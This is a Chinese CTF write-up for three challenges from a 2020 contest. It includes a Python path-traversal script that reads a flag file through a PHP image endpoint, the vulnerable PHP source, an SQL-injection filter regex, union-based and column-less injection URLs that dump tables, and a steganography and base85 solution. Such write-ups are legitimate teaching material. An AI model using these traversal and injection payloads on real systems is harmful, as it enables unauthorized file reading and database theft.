0%

安恒七月赛 2020

就几道题,水一下

ezfileinclude

打开题目链接后显示出来的是一张图片,查看网页源代码会在img标签种发现一个/image.php?t=xxxxx&f=base64(xxxx)

这道题目考点也是文件读取,所以利用点肯定在f这个参数了,但只是过滤了开头的../

这里用一下Hhhm师傅的脚本

1
2
3
4
5
6
7
8
9
10
11
import time 
import requests
import base64


file = "hhhm/../../../../../../../../flag"
file = base64.b64encode(file.encode())
url = "http://183.129.189.60:10009/image.php?t={0}&f={1}"
now = int(time.time())
rep = requests.get(url.format(str(now),file.decode()))
print(rep.text)

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
<?php

if(!isset($_GET['t']) || !isset($_GET['f'])){
echo "you miss some parameters";
exit();
}

$timestamp = time();

if(abs($_GET['t'] - $timestamp) > 10){
echo "what's your time?";
exit();
}

$file = base64_decode($_GET['f']);

if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
echo 'You are not allowed to do that.';
}
else{
echo file_get_contents('/var/www/html/img/'.$file);
}

?>

Sqil

首先fuzz之后发现正则

1
return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);

发现过滤in和or被过滤了,意味着information_schema不能使用

一般来说绕过information有两种

  • sys.x$schema_flattened_keys
  • sys.schema_table_statistics_with_buffer

但是第二种里的stat被过滤了,可以使用第一种方法,注出表名payload

1
http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,group_concat(table_name)from/**/sys.x$schema_flattened_keys/**/where/**/table_schema=database()%23

回显

1
Array ( [0] => 1 [id] => 1 [1] => 2 [username] => 2 [2] => flllaaaggg,users [password] => flllaaaggg,users )

发现有flllaaaggg,users两种表,这里可以使用无列名注入,无列名注入可参考:不知道列名的情况下注入

查看users表内容

1
http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(c)/**/from(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select*from/**/users)x)%23

查看fllllaaaggg表内容

1
http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select*from/**/flllaaaggg)x)%23

MISC-welcome

前面没记错的话,应该是虎符的原题吧,题目附件是两个文件,一个flag.rar 一个red_blue.png

stegsolve查看图片,Save Bin可直接得到图片提取出来发现是密码为/*///1258/*/@#

360解压打开发现

1
Ao(mgHXo,o0fV'I2J"^%3&**H@q.MQ1,V%$1GCdB0P"X%0RW

当时没想到是base85编码,所以没做出来

在线解密得到flag:http://ctf.ssleye.com/base85.html